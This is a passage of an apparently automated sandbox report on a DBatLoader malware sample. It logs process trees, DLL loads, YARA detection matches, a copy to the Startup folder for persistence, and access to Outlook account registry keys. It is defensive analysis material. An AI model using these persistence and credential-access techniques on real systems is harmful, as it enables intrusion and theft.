                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp60.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: msvcp60.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior

                    Data Obfuscation

                    barindex
                    Yara detected DBatLoader
                    Source: Yara matchFile source: file.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2049993958.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2285813255.00000000046A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\SGS.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe, type: DROPPED
                    Yara detected aPLib compressed binary
                    Source: Yara matchFile source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,5_2_00410065
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019BF0C pushad ; retn 0019h0_2_0019BF0D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019EE5B pushad ; ret 0_2_0019EE8C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_042FFF86 push B3F78F00h; retf 0000h0_2_042FFF8F
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 2_2_0019ED03 pushad ; ret 2_2_0019ED34
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 2_2_0019CF30 push esp; iretd 2_2_0019CF31
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 2_2_0019C9A0 push E86FEAB0h; retf 2_2_0019C9A5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 2_2_0019C258 pushad ; ret 2_2_0019C259
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 2_2_0019C95C push E86FEAB0h; retf 2_2_0019C961
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 9_2_0019CA1E push eax; retf 0019h9_2_0019CA35
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 9_2_0019CA00 push eax; retf 0019h9_2_0019CA01
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 9_2_0019CA3C push eax; retf 0019h9_2_0019CA3D
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 9_2_0019C325 push esp; ret 9_2_0019C32D
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 9_2_0019EE5B pushad ; ret 9_2_0019EE8C
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 9_2_0019C9F0 push eax; retf 0019h9_2_0019C9F1
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 10_2_0019ED03 pushad ; ret 10_2_0019ED34
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 10_2_0019C9A0 push E86FEAB0h; retf 10_2_0019C9A5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 10_2_0019C95C push E86FEAB0h; retf 10_2_0019C961
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 10_2_0019CF6C push esp; iretd 10_2_0019CF75
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00412850 push eax; ret 11_2_0041286E
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00412880 push eax; ret 11_2_004128AE
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040D342 